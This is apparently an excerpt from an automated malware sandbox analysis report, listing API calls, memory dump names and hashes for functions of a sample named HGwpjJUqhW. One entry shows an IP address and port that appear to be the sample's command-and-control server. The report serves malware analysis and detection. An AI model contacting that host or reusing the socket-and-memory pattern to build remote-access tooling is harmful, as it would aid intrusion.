                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: 494f605f70349b78b2b8633a62bfb558f38f90998586665a23a3a3243462754d
                                                                                                                            • Instruction ID: fdb62915d504faf6d25e2b0f3c3bb8899ff32edeadcb2539ff3184284402d77b
                                                                                                                            • Opcode Fuzzy Hash: 494f605f70349b78b2b8633a62bfb558f38f90998586665a23a3a3243462754d
                                                                                                                            • Instruction Fuzzy Hash: CB21BE74E04B09ABDB10DFA9D845B6FBBF8EF41701F0085ADE949A2644EB30A8508B44
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 02C3112F
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C3115F
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C31192
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: 853a2556b3efea8bef58b5d23f59a5bf7b66cbc657f48b339a2ce54e35070986
                                                                                                                            • Instruction ID: 9a9d92c38c2a8e9fd00e49e59c738ca8a20046892c7432e9184604421e5a52dd
                                                                                                                            • Opcode Fuzzy Hash: 853a2556b3efea8bef58b5d23f59a5bf7b66cbc657f48b339a2ce54e35070986
                                                                                                                            • Instruction Fuzzy Hash: 79118474E40705AFDB109FA9DC85B9EFBF8EF04705F008969E959E2240E770A9148B54
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 0362112F
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0362115F
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03621192
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: e95a3eea677f40f9195e112befa9e478a148172094910cf8ad552789173da06d
                                                                                                                            • Instruction ID: e6cf20466027a03e920654a9f05e75056d91593f3c4d612024617b0510ae7b1f
                                                                                                                            • Opcode Fuzzy Hash: e95a3eea677f40f9195e112befa9e478a148172094910cf8ad552789173da06d
                                                                                                                            • Instruction Fuzzy Hash: 4011D074E04B08AFDB10DFA9D886B6FFFF8EF05701F0084A9E959E6240E730A9108B54
                                                                                                                            APIs
                                                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03629E04
                                                                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03629E18
                                                                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03629E3B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 800915452-0
                                                                                                                            • Opcode ID: 29d01d67518ba7a6c23bb462d6e3f2f23d2240f400a9b393c42892c24e454810
                                                                                                                            • Instruction ID: ac7e1fda2132486f9f99201736bcfe544dda01f70c534634ea08f93356df7998
                                                                                                                            • Opcode Fuzzy Hash: 29d01d67518ba7a6c23bb462d6e3f2f23d2240f400a9b393c42892c24e454810
                                                                                                                            • Instruction Fuzzy Hash: 23F08176D00229978B11EF94D9448AEFBB8AF45B11B11454AF805AB344D7308E15CBD1
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64), ref: 03629ADC
                                                                                                                            • GdiplusStartup.GDIPLUS(0364FB60,?,?), ref: 03629B15
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64), ref: 03629B26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 389129658-0
                                                                                                                            • Opcode ID: 41868925c26dd5369b448f74150056fc83b3ee865bbdfe24f6f527368d3ff402
                                                                                                                            • Instruction ID: d6510d3be19ee1e8ad24078415d917363ef341757ff1e28a32c3e0eac59187d2
                                                                                                                            • Opcode Fuzzy Hash: 41868925c26dd5369b448f74150056fc83b3ee865bbdfe24f6f527368d3ff402
                                                                                                                            • Instruction Fuzzy Hash: 28F0C275E406099FDB00EFD1E82A7EBBBB8F705301F102199F80456244D7B20154CBA2
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID: 118.107.44.219$19091
                                                                                                                            • API String ID: 3472027048-838246116
                                                                                                                            • Opcode ID: b6cd9b7fb2a0fe5c1316a1649715c9fe73f562eb5e2c3d6883111fbef6dd95fe
                                                                                                                            • Instruction ID: 28a7d9eba2e33e830f2ec8e146bb28320fa6164dd507d47ba2b9dbcbce883f20
                                                                                                                            • Opcode Fuzzy Hash: b6cd9b7fb2a0fe5c1316a1649715c9fe73f562eb5e2c3d6883111fbef6dd95fe
                                                                                                                            • Instruction Fuzzy Hash: 37D022F0E401718BBA19851188A0537B3B5BE843693440A28FC8397280CAA8FC18DAA0
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 02C3715B
                                                                                                                              • Part of subcall function 02C39896: GetLastError.KERNEL32(00000001,00000000,02C37112,02C36F0C,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C3989A
                                                                                                                              • Part of subcall function 02C39896: ___set_flsgetvalue.LIBCMT ref: 02C398A8
                                                                                                                              • Part of subcall function 02C39896: __calloc_crt.LIBCMT ref: 02C398BC
                                                                                                                              • Part of subcall function 02C39896: DecodePointer.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C398D6
                                                                                                                              • Part of subcall function 02C39896: GetCurrentThreadId.KERNEL32 ref: 02C398EC
                                                                                                                              • Part of subcall function 02C39896: SetLastError.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C39904
                                                                                                                            • __freeptd.LIBCMT ref: 02C37165
                                                                                                                              • Part of subcall function 02C39A58: TlsGetValue.KERNEL32(?,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39A79
                                                                                                                              • Part of subcall function 02C39A58: TlsGetValue.KERNEL32(?,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39A8B
                                                                                                                              • Part of subcall function 02C39A58: DecodePointer.KERNEL32(00000000,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39AA1
                                                                                                                              • Part of subcall function 02C39A58: __freefls@4.LIBCMT ref: 02C39AAC
                                                                                                                              • Part of subcall function 02C39A58: TlsSetValue.KERNEL32(00000025,00000000,?,02C37711,00000000,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39ABE
                                                                                                                            • ExitThread.KERNEL32 ref: 02C3716E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4224061863-0
                                                                                                                            • Opcode ID: 184329003cbd9bb28fbe0d512bb1579657001b976ff23ee72bd3ae7714f44a84
                                                                                                                            • Instruction ID: 007cfd724e0a9c6bdb776d03ad721485d3470450b45593a8693d79b008b1f2d7
                                                                                                                            • Opcode Fuzzy Hash: 184329003cbd9bb28fbe0d512bb1579657001b976ff23ee72bd3ae7714f44a84
                                                                                                                            • Instruction Fuzzy Hash: 0DC08C2144024C2B8A123B328C0C90B3A9E8EC0340B900C10B80881000DEB0D8009D51
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 0362F969
                                                                                                                              • Part of subcall function 03633DE2: GetLastError.KERNEL32(00000001,00000000,0362F920,0362F6FC,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 03633DE6
                                                                                                                              • Part of subcall function 03633DE2: ___set_flsgetvalue.LIBCMT ref: 03633DF4
                                                                                                                              • Part of subcall function 03633DE2: __calloc_crt.LIBCMT ref: 03633E08
                                                                                                                              • Part of subcall function 03633DE2: DecodePointer.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633E22
                                                                                                                              • Part of subcall function 03633DE2: GetCurrentThreadId.KERNEL32 ref: 03633E38
                                                                                                                              • Part of subcall function 03633DE2: SetLastError.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633E50
                                                                                                                            • __freeptd.LIBCMT ref: 0362F973
                                                                                                                              • Part of subcall function 03633FA6: TlsGetValue.KERNEL32(?,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633FC7
                                                                                                                              • Part of subcall function 03633FA6: TlsGetValue.KERNEL32(?,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633FD9
                                                                                                                              • Part of subcall function 03633FA6: DecodePointer.KERNEL32(00000000,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633FEF
                                                                                                                              • Part of subcall function 03633FA6: __freefls@4.LIBCMT ref: 03633FFA
                                                                                                                              • Part of subcall function 03633FA6: TlsSetValue.KERNEL32(00000027,00000000,?,036310F0,00000000,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 0363400C
                                                                                                                            • ExitThread.KERNEL32 ref: 0362F97C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4224061863-0
                                                                                                                            • Opcode ID: 6030c25ae30906d63bc75ec049cf1b7d1e5554e05c7c6601f9e3848ef0002684
                                                                                                                            • Instruction ID: 3e5e7510b26dc61a4cd966bab344bec4dd10dbf973468e10229fb95788f95509
                                                                                                                            • Opcode Fuzzy Hash: 6030c25ae30906d63bc75ec049cf1b7d1e5554e05c7c6601f9e3848ef0002684
                                                                                                                            • Instruction Fuzzy Hash: E9C08C3C4047083F8B107732891891A7E2C8D802007740018B8048D200DE20DC008898
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 034A022B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                            • Instruction ID: 5c8aaf4b3901ad17c874f7cc9e2473b28f9d81af818ff8d8fc8c2abbcbfeab1e
                                                                                                                            • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                            • Instruction Fuzzy Hash: 1EA14C71A00A06EFDB14CFADC880AAEB7B5FF58304F1881AAE415DB751D770EA51CB94
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time_memmovetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1463837790-0
                                                                                                                            • Opcode ID: e611bc1531684fe6ab2ba7c75af826e30a4fb797514c41eabaaf72593474972d
                                                                                                                            • Instruction ID: 3eff380420f40d1d5af2e0770b76757c9483a4c3ce4dd6a6f79936e17b6d2b7d
                                                                                                                            • Opcode Fuzzy Hash: e611bc1531684fe6ab2ba7c75af826e30a4fb797514c41eabaaf72593474972d
                                                                                                                            • Instruction Fuzzy Hash: 415181727006419FD716DF69C8C0A6ABBA6BF84324714CAACE91ADB704DB31F951CBD0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Time_memmovetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1463837790-0
                                                                                                                            • Opcode ID: 18a83a2a4c0fd2549c0093624b5e2a6e78965aa4a866fd72b21ffc1a4e5fc500
                                                                                                                            • Instruction ID: 908232e423dce5ce98e179546ab014da8efa031cbb5660160c91d3e013680516
                                                                                                                            • Opcode Fuzzy Hash: 18a83a2a4c0fd2549c0093624b5e2a6e78965aa4a866fd72b21ffc1a4e5fc500
                                                                                                                            • Instruction Fuzzy Hash: 2E51F57A700A259FC711CF69C9C0D6ABBA9BF4421072A86ACE809CB700D734F941CFA0
                                                                                                                            APIs
                                                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02C33023
                                                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 02C33044
                                                                                                                              • Part of subcall function 02C3710D: __getptd_noexit.LIBCMT ref: 02C3710D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4248608111-0
                                                                                                                            • Opcode ID: 34f1be8fd1b981532bbd8d4aa2a8ea5e84aa0f4027545e3e7f7ff9ccf79fe120
                                                                                                                            • Instruction ID: 5021bfb3435da1dfb3ece92ffd31151f5857a13de1b29fde8b8914c9a40a4365
                                                                                                                            • Opcode Fuzzy Hash: 34f1be8fd1b981532bbd8d4aa2a8ea5e84aa0f4027545e3e7f7ff9ccf79fe120
                                                                                                                            • Instruction Fuzzy Hash: 6321A6B1E00248DBDB22DF64DC88B9A77B5EF45314F1009E5E5156B190DB71AA84CFE1
                                                                                                                            APIs
                                                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03623043
                                                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 03623064
                                                                                                                              • Part of subcall function 0362F91B: __getptd_noexit.LIBCMT ref: 0362F91B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4248608111-0
                                                                                                                            • Opcode ID: afaebe1e7b62a017a6ad0c47d1fbed4693fb40b778a7379dfd29e4506d993b78
                                                                                                                            • Instruction ID: 65ef1cb1497bddf065f22c68e0e9b9e5b4ffcf18e09e11d49e5f2d427784a1eb
                                                                                                                            • Opcode Fuzzy Hash: afaebe1e7b62a017a6ad0c47d1fbed4693fb40b778a7379dfd29e4506d993b78
                                                                                                                            • Instruction Fuzzy Hash: EC21E6789007289BDB20EF69DD44B9A7BB4EF04310F2A05A5E5045F3C0D7B49980CFB5
                                                                                                                            APIs
                                                                                                                            • send.WS2_32(?,?,00040000,00000000), ref: 03623291
                                                                                                                            • send.WS2_32(?,?,?,00000000), ref: 036232CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: send
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2809346765-0
                                                                                                                            • Opcode ID: 85ff90ae9eb4c09494319e0277c8df2f8f78626af34bd54697b2a46b996ba106
                                                                                                                            • Instruction ID: a93a013a886250555c3d5c12b8285c5963db079545e3c2a30a36adfda7695925
                                                                                                                            • Opcode Fuzzy Hash: 85ff90ae9eb4c09494319e0277c8df2f8f78626af34bd54697b2a46b996ba106
                                                                                                                            • Instruction Fuzzy Hash: EB11E97AB02B1467C720CA6ADD84B5ABF99FB41364F364125F908D7380D378ED418A5C
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SleepTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 346578373-0
                                                                                                                            • Opcode ID: 4ae49f2e733b8c625c1a18179756460b8b5e713efd7c0d32e98be73ddb0b7e95
                                                                                                                            • Instruction ID: a5703108e563902ca281abcb9844decb82028e244ae37dfd2ab78d238c290b1f
                                                                                                                            • Opcode Fuzzy Hash: 4ae49f2e733b8c625c1a18179756460b8b5e713efd7c0d32e98be73ddb0b7e95
                                                                                                                            • Instruction Fuzzy Hash: ED01D435600645AFD711CF29D8C8B6DB3B5FB99345F144664D5008B2C0C775AAD5C7D1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: SleepTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 346578373-0
                                                                                                                            • Opcode ID: 538459c2f22fb5caa6d512776774ba82b64a9fb52dda716a7a1edc78c9241e92
                                                                                                                            • Instruction ID: 0ec5eb19a2861e146e57c7fd8679c1157a1d566398177841f8169cd5a538e1de
                                                                                                                            • Opcode Fuzzy Hash: 538459c2f22fb5caa6d512776774ba82b64a9fb52dda716a7a1edc78c9241e92
                                                                                                                            • Instruction Fuzzy Hash: 9201D439600615AFD315DF28C8C8B69FFB5FB59305F294264E60447380C735A9D6CBD1
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02C35AF2), ref: 02C3642B
                                                                                                                            • _free.LIBCMT ref: 02C36466
                                                                                                                              • Part of subcall function 02C31280: __CxxThrowException@8.LIBCMT ref: 02C31290
                                                                                                                              • Part of subcall function 02C31280: DeleteCriticalSection.KERNEL32(00000000,?,02C47E78), ref: 02C312A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1116298128-0
                                                                                                                            • Opcode ID: 3b0103dc7ed38717ae8e1f7aac1c2cb0372064f90573f088561b52be982f79ed
                                                                                                                            • Instruction ID: 9a4a6630a86f7df0e865a9f7365b00ff3ba96bbf5d2eb4e0a34acb3f6a949850
                                                                                                                            • Opcode Fuzzy Hash: 3b0103dc7ed38717ae8e1f7aac1c2cb0372064f90573f088561b52be982f79ed
                                                                                                                            • Instruction Fuzzy Hash: 960168B4A00B409FC3219F6A9844A07FAE8BF98710B104A1EE2DAC6A10D370A145CF95
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,0362E04E,00000000,03629800,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 0362CD1B
                                                                                                                            • _free.LIBCMT ref: 0362CD56
                                                                                                                              • Part of subcall function 03621280: __CxxThrowException@8.LIBCMT ref: 03621290
                                                                                                                              • Part of subcall function 03621280: DeleteCriticalSection.KERNEL32(00000000,0362D3E6,03646624,?,?,0362D3E6,?,?,?,?,03645A40,00000000), ref: 036212A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1116298128-0
